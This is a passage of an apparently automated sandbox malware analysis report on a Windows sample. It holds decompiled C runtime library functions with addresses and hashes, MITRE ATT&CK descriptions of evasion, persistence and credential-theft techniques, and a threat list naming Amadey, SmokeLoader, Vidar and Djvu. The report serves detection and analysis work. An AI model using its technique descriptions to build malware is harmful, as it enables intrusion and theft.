				if(_t3 != 1) {
					_t16 = _a4;
					__eflags = _t3 - 3;
					if(__eflags != 0) {
						L8:
						__eflags = _t16;
						if(_t16 == 0) {
							_t16 = _t16 + 1;
							__eflags = _t16;
						}
						_t18 = _t16 + 0x0000000f & 0xfffffff0;
						__eflags = _t18;
						_t4 = HeapAlloc( *0x4b9f04, 0, _t18);
					} else {
						_push(_t16);
						_t4 = E0040D2D3(_t9, _t14, _t16, __eflags);
						__eflags = _t4;
						if(_t4 == 0) {
							goto L8;
						}
					}
					return _t4;
				} else {
					_t5 = _a4;
					if(_t5 == 0) {
						_t5 = _t5 + 1;
					}
					return HeapAlloc( *0x4b9f04, 0, _t5);
				}
			}

0x0040d322
0x0040d322
0x0040d32e
0x0040d330
0x0040d337
0x0040d341
0x0040d347
0x0040d348
0x0040d350
0x0040d36c
0x0040d36f
0x0040d372
0x0040d37f
0x0040d37f
0x0040d381
0x0040d383
0x0040d383
0x0040d383
0x0040d387
0x0040d387
0x0040d393
0x0040d374
0x0040d374
0x0040d375
0x0040d37b
0x0040d37d
0x00000000
0x00000000
0x0040d37d
0x0040d39b
0x0040d352
0x0040d352
0x0040d357
0x0040d359
0x0040d359
0x0040d36a
0x0040d36a

APIs

__FF_MSGBANNER.LIBCMT ref: 0040D330

Part of subcall function 0040FB6C: __set_error_mode.LIBCMT ref: 0040FB6E
Part of subcall function 0040FB6C: __set_error_mode.LIBCMT ref: 0040FB7B
Part of subcall function 0040FB6C: __NMSG_WRITE.LIBCMT ref: 0040FB93
Part of subcall function 0040FB6C: __NMSG_WRITE.LIBCMT ref: 0040FB9D

__NMSG_WRITE.LIBCMT ref: 0040D337

Part of subcall function 0040F99B: __set_error_mode.LIBCMT ref: 0040F9CC
Part of subcall function 0040F99B: __set_error_mode.LIBCMT ref: 0040F9DD
Part of subcall function 0040F99B: _strcpy_s.LIBCMT ref: 0040FA11
Part of subcall function 0040F99B: __invoke_watson.LIBCMT ref: 0040FA22
Part of subcall function 0040F99B: GetModuleFileNameA.KERNEL32(00000000,004B9AF9,00000104), ref: 0040FA3E
Part of subcall function 0040F99B: _strcpy_s.LIBCMT ref: 0040FA53
Part of subcall function 0040F99B: __invoke_watson.LIBCMT ref: 0040FA66
Part of subcall function 0040F99B: _strlen.LIBCMT ref: 0040FA6F
Part of subcall function 0040F99B: _strlen.LIBCMT ref: 0040FA7C
Part of subcall function 0040F99B: __invoke_watson.LIBCMT ref: 0040FAA9

Part of subcall function 0040DE85: ___crtCorExitProcess.LIBCMT ref: 0040DE8D
Part of subcall function 0040DE85: ExitProcess.KERNEL32 ref: 0040DE96

HeapAlloc.KERNEL32(00000000,?), ref: 0040D363
HeapAlloc.KERNEL32(00000000,?), ref: 0040D393

Part of subcall function 0040D2D3: __lock.LIBCMT ref: 0040D2F0
Part of subcall function 0040D2D3: ___sbh_alloc_block.LIBCMT ref: 0040D2FB

Memory Dump Source

Source File: 00000005.00000002.440687279.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.440678755.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440782268.00000000004B8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440793412.0000000000544000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_759F.jbxd

Similarity

API ID: __set_error_mode$__invoke_watson$AllocExitHeapProcess_strcpy_s_strlen$FileModuleName___crt___sbh_alloc_block__lock
String ID:
API String ID: 913549098-0
Opcode ID: 1bf21bfa8409a38e0b81333ecaa1f3a68ce9f06773324b76ccb6426e5b47b888
Instruction ID: 95d73a6e3837787ea70fd540b7552cb61de9413ba6cdb6b0eee1eafe80a29d40
Opcode Fuzzy Hash: 1bf21bfa8409a38e0b81333ecaa1f3a68ce9f06773324b76ccb6426e5b47b888
Instruction Fuzzy Hash: 55F0FF31D00611A7DB202BA5EC02BBB3758EB50734F100136FE08FAAE1DB38AC44858E

Uniqueness

Uniqueness Score: -1.00%

Function 004102B4 Relevance: 6.0, APIs: 4, Instructions: 34
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E004102B4(void* __eax, void* __esi) {
				int _t5;
				void* _t9;
				void* _t15;
				void** _t17;
				void* _t19;

				_t15 = __esi +  *((intOrPtr*)(_t19 + 0x57));
				_t9 = 0;
				if( *0x542bec > 0) {
					_push(_t15);
					_t17 =  *0x542bf0 + 0x10;
					do {
						VirtualFree( *(_t17 - 4), 0, 0x8000);
						HeapFree( *0x4b9f04, 0,  *_t17);
						_t17 =  &(_t17[5]);
						_t9 = _t9 + 1;
					} while (_t9 <  *0x542bec);
				}
				HeapFree( *0x4b9f04, 0,  *0x542bf0);
				_t5 = HeapDestroy( *0x4b9f04);
				 *0x4b9f04 =  *0x4b9f04 & 0x00000000;
				return _t5;
			}

0x004102b9
0x004102bd
0x004102cc
0x004102ce
0x004102d5
0x004102d8
0x004102e2
0x004102f2
0x004102f4
0x004102f7
0x004102f8
0x00410300
0x0041030f
0x00410319
0x0041031f
0x00410326

APIs

VirtualFree.KERNEL32(?,00000000,00008000,?), ref: 004102E2
HeapFree.KERNEL32(00000000,?), ref: 004102F2
HeapFree.KERNEL32(00000000), ref: 0041030F
HeapDestroy.KERNEL32 ref: 00410319

Memory Dump Source

Source File: 00000005.00000002.440687279.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.440678755.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440782268.00000000004B8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440793412.0000000000544000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_759F.jbxd

Similarity

API ID: FreeHeap$DestroyVirtual
String ID:
API String ID: 765507482-0
Opcode ID: 49b842bac83bfa21c72876152a937a11af43082d69a2edee6b12e5c747abb62a
Instruction ID: 740fb3c5ca2affce0eb55b74982db13d5b074bfbf52f505bc3b1ad6661c37504
Opcode Fuzzy Hash: 49b842bac83bfa21c72876152a937a11af43082d69a2edee6b12e5c747abb62a
Instruction Fuzzy Hash: E3F0903A900120BFD7114F65ED85B993B29FB48329F920035F740A60B1C3B22C54EF58

Uniqueness

Uniqueness Score: -1.00%

Function 00409CA7 Relevance: 6.0, APIs: 4, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E00409CA7(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t13;
				void* _t25;
				intOrPtr _t27;
				intOrPtr _t29;
				void* _t30;
				void* _t31;

				_t31 = __eflags;
				_t26 = __edi;
				_t22 = __ebx;
				_push(0xc);
				_push(0x4b61d8);
				E0040E1B4(__ebx, __edi, __esi);
				_t29 = E0040D8A2(__ebx, _t25, _t31);
				_t13 =  *0x4b8a34; // 0xfffffffe
				if(( *(_t29 + 0x70) & _t13) == 0) {
					L6:
					E00410EE5(_t22, _t26, 0xc);
					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
					_t8 = _t29 + 0x6c; // 0x6c
					_t27 =  *0x4b8930; // 0x4b8858
					 *((intOrPtr*)(_t30 - 0x1c)) = E00409C69(_t8, _t27);
					 *(_t30 - 4) = 0xfffffffe;
					E00409D11();
				} else {
					_t33 =  *((intOrPtr*)(_t29 + 0x6c));
					if( *((intOrPtr*)(_t29 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t29 =  *((intOrPtr*)(E0040D8A2(_t22, _t25, _t33) + 0x6c));
					}
				}
				if(_t29 == 0) {
					E0040DE31(_t25, 0x20);
				}
				return E0040E1F9(_t29);
			}

0x00409ca7
0x00409ca7
0x00409ca7
0x00409ca7
0x00409ca9
0x00409cae
0x00409cb8
0x00409cba
0x00409cc2
0x00409ce6
0x00409ce8
0x00409cee
0x00409cf2
0x00409cf5
0x00409d00
0x00409d03
0x00409d0a
0x00409cc4
0x00409cc4
0x00409cc8
0x00000000
0x00409cca
0x00409ccf
0x00409ccf
0x00409cc8
0x00409cd4
0x00409cd8
0x00409cdd
0x00409ce5

APIs

__getptd.LIBCMT ref: 00409CB3

Part of subcall function 0040D8A2: __getptd_noexit.LIBCMT ref: 0040D8A5
Part of subcall function 0040D8A2: __amsg_exit.LIBCMT ref: 0040D8B2

__getptd.LIBCMT ref: 00409CCA
__amsg_exit.LIBCMT ref: 00409CD8
__lock.LIBCMT ref: 00409CE8

Memory Dump Source

Source File: 00000005.00000002.440687279.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.440678755.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440782268.00000000004B8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440793412.0000000000544000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_759F.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: b90fbe0585a0c9fa50929fe688817773d467098657ad066e9b23770094edad9d
Instruction ID: d3d4f0b979faaad96cbf508618378bd0f225d67579ad058386747ca1fb48d848
Opcode Fuzzy Hash: b90fbe0585a0c9fa50929fe688817773d467098657ad066e9b23770094edad9d
Instruction Fuzzy Hash: 7AF04932E197148BE620BBAB850675A32A06F40728F14456FA4507B2D2CB3C9C419A5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040822A Relevance: 6.0, APIs: 4, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040822A(intOrPtr* __eax, void* __ecx, void* __edi) {
				intOrPtr* _t14;
				void* _t18;
				void* _t20;
				intOrPtr _t23;
				void* _t26;

				 *__eax =  *__eax + __eax;
				 *((intOrPtr*)(__ecx + 0x6de80847)) =  *((intOrPtr*)(__ecx + 0x6de80847)) + __ecx;
				_push(_t23);
				 *__eax =  *__eax + __eax;
				 *((intOrPtr*)(__edi + 0xc)) =  *((intOrPtr*)(__eax + 0x8c));
				 *((intOrPtr*)(E0040D8A2(_t18, _t20, _t26) + 0x88)) = _t23;
				 *((intOrPtr*)(E0040D8A2(_t18, _t20, _t26) + 0x90)) =  *((intOrPtr*)(E0040D8A2(_t18, _t20, _t26) + 0x90)) - 1;
				_t14 = E0040D8A2(_t18, _t20, _t26);
				 *_t14 =  *_t14 + _t14;
				 *_t14 =  *_t14 + _t14;
				_t28 =  *_t14;
				if( *_t14 < 0) {
					 *(E0040D8A2(_t18, _t20, _t28) + 0x90) =  *(_t17 + 0x90) & 0x00000000;
				}
				return 1;
			}

0x0040822a
0x0040822c
0x00408232
0x00408233
0x0040823b
0x00408243
0x0040825d
0x0040825f
0x00408267
0x00408269
0x00408269
0x0040826d
0x00408274
0x00408274
0x0040827f

APIs

__getptd.LIBCMT ref: 0040823E

Part of subcall function 0040D8A2: __getptd_noexit.LIBCMT ref: 0040D8A5
Part of subcall function 0040D8A2: __amsg_exit.LIBCMT ref: 0040D8B2

__getptd.LIBCMT ref: 00408253
__getptd.LIBCMT ref: 0040825F
__getptd.LIBCMT ref: 0040826F

Memory Dump Source

Source File: 00000005.00000002.440687279.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.440678755.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440782268.00000000004B8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440793412.0000000000544000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_759F.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID:
API String ID: 803148776-0
Opcode ID: 57fde2d58b7cfeb228123abb2ab6870129fc2125593b61845a9b3bff6861e860
Instruction ID: 35794585a1df80ca1f1a28052227dcdc62b1222c6f7531b19b3f64298fde7a9c
Opcode Fuzzy Hash: 57fde2d58b7cfeb228123abb2ab6870129fc2125593b61845a9b3bff6861e860
Instruction Fuzzy Hash: 30E06D328582408FE711BBB6C509BA437A0BF52328F0990FF90989B193DB3C4009875A

Uniqueness

Uniqueness Score: -1.00%

Function 0040E3D2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E3D2() {
				intOrPtr _t5;
				intOrPtr _t6;
				intOrPtr _t10;
				void* _t12;
				intOrPtr _t15;
				intOrPtr* _t16;
				signed int _t19;
				signed int _t20;
				intOrPtr _t26;
				intOrPtr _t27;

				_t5 =  *0x543d40;
				_t26 = 0x14;
				if(_t5 != 0) {
					if(_t5 < _t26) {
						_t5 = _t26;
						goto L4;
					}
				} else {
					_t5 = 0x200;
					L4:
					 *0x543d40 = _t5;
				}
				_t6 = E0040DC72(_t5, 4);
				 *0x542d20 = _t6;
				if(_t6 != 0) {
					L8:
					_t19 = 0;
					_t15 = 0x4b8380;
					while(1) {
						 *((intOrPtr*)(_t19 + _t6)) = _t15;
						_t15 = _t15 + 0x20;
						_t19 = _t19 + 4;
						if(_t15 >= 0x4b8600) {
							break;
						}
						_t6 =  *0x542d20;
					}
					_t27 = 0xfffffffe;
					_t20 = 0;
					_t16 = 0x4b8390;
					do {
						_t10 =  *((intOrPtr*)(((_t20 & 0x0000001f) << 6) +  *((intOrPtr*)(0x542c20 + (_t20 >> 5) * 4))));
						if(_t10 == 0xffffffff || _t10 == _t27 || _t10 == 0) {
							 *_t16 = _t27;
						}
						_t16 = _t16 + 0x20;
						_t20 = _t20 + 1;
					} while (_t16 < 0x4b83f0);
					return 0;
				} else {
					 *0x543d40 = _t26;
					_t6 = E0040DC72(_t26, 4);
					 *0x542d20 = _t6;
					if(_t6 != 0) {
						goto L8;
					} else {
						_t12 = 0x1a;
						return _t12;
					}
				}
			}

0x0040e3d2
0x0040e3da
0x0040e3dd
0x0040e3e8
0x0040e3ea
0x00000000
0x0040e3ea
0x0040e3df
0x0040e3df
0x0040e3ec
0x0040e3ec
0x0040e3ec
0x0040e3f4
0x0040e3fb
0x0040e402
0x0040e422
0x0040e422
0x0040e424
0x0040e430
0x0040e430
0x0040e433
0x0040e436
0x0040e43f
0x00000000
0x00000000
0x0040e42b
0x0040e42b
0x0040e443
0x0040e444
0x0040e446
0x0040e44c
0x0040e460
0x0040e466
0x0040e470
0x0040e470
0x0040e472
0x0040e475
0x0040e476
0x0040e482
0x0040e404
0x0040e407
0x0040e40d
0x0040e414
0x0040e41b
0x00000000
0x0040e41d
0x0040e41f
0x0040e421
0x0040e421
0x0040e41b

APIs

__calloc_crt.LIBCMT ref: 0040E3F4
__calloc_crt.LIBCMT ref: 0040E40D

Strings

@-T, xrefs: 0040E424

Memory Dump Source

Source File: 00000005.00000002.440687279.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.440678755.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440782268.00000000004B8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440793412.0000000000544000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_759F.jbxd

Similarity

API ID: __calloc_crt
String ID: @-T
API String ID: 3494438863-3287784400
Opcode ID: 9b4d19814896e2116347b05f70e1c8deb8d83a7b25c5fff3cbc10c09b87ceba3
Instruction ID: 9770feb4054c6108d69cea341a5419b7e16bee5cdb74d267bdee963161eb0f0d
Opcode Fuzzy Hash: 9b4d19814896e2116347b05f70e1c8deb8d83a7b25c5fff3cbc10c09b87ceba3
Instruction Fuzzy Hash: FE110A71B0421047E3288A2FBC506A66385E76672CB54493FF501EB3E1EB78D851965C

Uniqueness

Uniqueness Score: -1.00%

Function 00408789 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E00408789(void* __edi, intOrPtr* __esi) {
				intOrPtr _t17;
				void* _t19;
				void* _t26;
				intOrPtr* _t28;
				void* _t29;
				void* _t30;

				_t28 = __esi;
				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
				E0040978B(_t19, _t26, __edi, __esi,  *((intOrPtr*)(_t29 - 0x28)));
				 *((intOrPtr*)(E0040D8A2(_t19, _t26, _t30) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
				_t17 = E0040D8A2(_t19, _t26, _t30);
				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
					_t17 =  *((intOrPtr*)(__esi + 0x14));
					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
						if( *((intOrPtr*)(_t29 - 0x34)) == 0 &&  *((intOrPtr*)(_t29 - 0x1c)) != 0) {
							_t17 = E00409764( *((intOrPtr*)(_t28 + 0x18)));
							_t38 = _t17;
							if(_t17 != 0) {
								_push( *((intOrPtr*)(_t29 + 0x10)));
								_push(_t28);
								return E00408138(_t38);
							}
						}
					}
				}
				return _t17;
			}

0x00408789
0x0040878c
0x00408792
0x004087a0
0x004087a6
0x004087ae
0x004087ba
0x004087c2
0x004087ca
0x004087de
0x004087e9
0x004087ef
0x004087f1
0x004087f3
0x004087f6
0x00000000
0x004087fd
0x004087f1
0x004087de
0x004087ca
0x004087fe

APIs

Part of subcall function 0040978B: __getptd.LIBCMT ref: 00409791
Part of subcall function 0040978B: __getptd.LIBCMT ref: 004097A1

__getptd.LIBCMT ref: 00408798

Part of subcall function 0040D8A2: __getptd_noexit.LIBCMT ref: 0040D8A5
Part of subcall function 0040D8A2: __amsg_exit.LIBCMT ref: 0040D8B2

__getptd.LIBCMT ref: 004087A6

Strings

csm, xrefs: 004087B4

Memory Dump Source

Source File: 00000005.00000002.440687279.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.440678755.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440782268.00000000004B8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440793412.0000000000544000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_759F.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: daa517f2b35d0d328a18bf3d568afc1c0914dc272237a36230f07ab38a243962
Instruction ID: eb95db488268b431e35fa113dd89191eab752858fcb32938d13c6dcf038271da
Opcode Fuzzy Hash: daa517f2b35d0d328a18bf3d568afc1c0914dc272237a36230f07ab38a243962
Instruction Fuzzy Hash: 75011A36801205DACB34AF66CA4066EB3B5BF10315F64443FE4806B6E6CF388985DB19

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Amadey

Threatname: Clipboard Hijacker

Threatname: Djvu

Threatname: SmokeLoader

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\04031145864587914309142422

C:\ProgramData\32481721746715624350572573

C:\ProgramData\39986893892571498106323037

C:\ProgramData\60090388873110152559435265

C:\ProgramData\76721623111786000092412651

Windows Analysis Report
file.exe

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

